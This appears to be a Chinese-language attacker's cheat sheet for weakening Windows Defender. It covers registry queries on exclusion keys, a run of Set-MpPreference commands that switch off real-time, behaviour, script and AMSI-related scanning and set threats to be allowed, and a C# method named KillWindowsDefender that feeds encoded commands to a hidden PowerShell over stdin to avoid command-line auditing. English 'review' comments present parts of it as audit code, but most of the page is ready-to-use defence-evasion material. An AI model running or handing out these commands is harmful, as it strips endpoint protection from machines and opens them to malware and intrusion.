通过修改 Defender 扫描行为、扫描强度等设置来尽量降低 Defender 防护强度
Defender白名单注册表键值
在较新的版本中已启用 Tamper Protection，因此这种方法不再可行
直接向白名单路径下添加值即可
- 目录及文件:
REM Read-only audit query: lists the path exclusions currently configured (HKLM is the short form of HKEY_LOCAL_MACHINE).
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
- 后缀:
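REM Read-only audit query: lists the extension exclusions. The key path must be quoted,
REM as on the Paths query above: "Windows Defender" contains a space, so the unquoted form
REM is split into two arguments and reg.exe rejects it as invalid syntax.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions"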
- 进程:
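REM Read-only audit query: lists the process exclusions. Quoted for the same reason as the
REM Paths query above: the space in "Windows Defender" otherwise splits the key path into
REM two arguments and reg.exe reports invalid syntax.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes"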
降低Defender防护能力
REM Each line launches powershell.exe from cmd and changes one Defender preference.
REM NOTE(review): these are visible configuration changes, not silent ones. The first
REM line pops a user notification (the author's own annotation says so), the page's
REM earlier remark about Tamper Protection applies (on hosts where it is enabled the
REM protected settings are expected to be rejected), and changes of this kind are
REM normally recorded in the Defender operational event log -- a detection point worth
REM confirming on a test host.
powershell Set-MpPreference -DisableRealtimeMonitoring $true //禁用实时监控,执行了会在右下角有提示,不使用
powershell Set-MpPreference -DisableArchiveScanning $true //禁用存档扫描
powershell Set-MpPreference -DisableBehaviorMonitoring $true //禁用行为监控
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
powershell Set-MpPreference -DisableIOAVProtection $true //禁用IOAV保护,禁用AMSI
powershell Set-MpPreference -DisablePrivacyMode $true //禁用隐私模式
powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true //没有引擎启动时签名禁用更新
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell Set-MpPreference -DisableScriptScanning $true //禁用脚本扫描
powershell Set-MpPreference -SubmitSamplesConsent 2
powershell Set-MpPreference -MAPSReporting 0
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
powershell Set-MpPreference -ModerateThreatDefaultAction 6
powershell Set-MpPreference -LowThreatDefaultAction 6
powershell Set-MpPreference -SevereThreatDefaultAction 6 //严重威胁默认操作
检测是否是Defender
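using Microsoft.Win32;

/// <summary>
/// Audit helper: reports whether the Windows Defender policy values in HKLM
/// declare the product disabled. Returns <c>true</c> unless the registry
/// explicitly says Defender is turned off, and also <c>true</c> whenever the
/// key cannot be read (fails towards "protection present").
/// </summary>
/// <returns>
/// <c>false</c> only when <c>DisableAntiSpyware</c> or <c>DisableAntiVirus</c> under
/// <c>HKLM\SOFTWARE\Microsoft\Windows Defender</c> holds the value 1; otherwise <c>true</c>.
/// </returns>
/// <remarks>
/// Only these two legacy policy values are consulted; a <c>true</c> result does not prove
/// the service is actually running. The previous version called <c>GetValue(...).ToString()</c>,
/// which throws when a value is absent (the normal case), and combined that with the
/// non-short-circuit <c>|</c>: with <c>DisableAntiSpyware</c> set to 1 and
/// <c>DisableAntiVirus</c> absent it threw and reported <c>true</c>. Missing values are now
/// read as "not disabled" instead of relying on the exception path.
/// </remarks>
public static bool isDefender()
{
    const string regPath = @"SOFTWARE\Microsoft\Windows Defender";
    try
    {
        using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.Default))
        {
            // OpenSubKey returns null when the key does not exist; no key means no "disabled" flag.
            if (key == null)
            {
                return true;
            }
            return !(IsFlagSet(key, "DisableAntiSpyware") || IsFlagSet(key, "DisableAntiVirus"));
        }
    }
    catch (Exception)
    {
        // Deliberately conservative: any read failure (access denied, unsupported platform, ...)
        // is reported as "Defender present" rather than "Defender disabled".
        return true;
    }
}

/// <summary>
/// True when <paramref name="valueName"/> under <paramref name="key"/> holds 1 -- whether stored
/// as a DWORD/QWORD or as the string "1"; false when the value is absent or holds anything else.
/// </summary>
/// <param name="key">An open registry key (not null).</param>
/// <param name="valueName">Name of the value to read.</param>
private static bool IsFlagSet(RegistryKey key, string valueName)
{
    object value = key.GetValue(valueName);
    // Convert.ToString(null, ...) yields "", so a missing value never compares equal to "1".
    return Convert.ToString(value, System.Globalization.CultureInfo.InvariantCulture) == "1";
}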
关闭Defender防护
/// <summary>
/// Starts a hidden powershell.exe (fixed absolute path, no command-line arguments) and feeds it
/// a list of commands over its redirected standard input. The commands come from a Base64 string
/// decoded as UTF-16LE and split on commas; the string itself is shown redacted on this page.
/// </summary>
/// <remarks>
/// NOTE(review), defender's view: because the commands travel over stdin rather than the
/// argument list, process command-line auditing alone does not capture them; the observable
/// signals are this process spawning powershell.exe with redirected stdin/stdout/stderr and
/// no window, and the decoded text being echoed to this process's stdout on every iteration.
/// The method writes "exit" and disposes the Process object immediately, without waiting for
/// the child or reading the redirected output it requested.
/// </remarks>
public static void KillWindowsDefender()
{
    // Payload is stored Base64-encoded; Encoding.Unicode decodes the bytes as UTF-16LE.
    string pj = @"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";
    pj = Encoding.Unicode.GetString(Convert.FromBase64String(pj));
    Process p = new Process();
    // Absolute path to the Windows PowerShell host; nothing is passed via Arguments.
    p.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.CreateNoWindow = true;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.StartInfo.RedirectStandardInput = true;
    p.Start();
    // One comma-separated element per line; each is echoed locally and then written to the child's stdin.
    foreach (var i in pj.Split(','))
    {
        Console.WriteLine(i);
        p.StandardInput.WriteLine(i);
    }
    p.StandardInput.WriteLine("exit");
    // Disposed right away; no WaitForExit and the redirected output streams are never read.
    p.Dispose();
}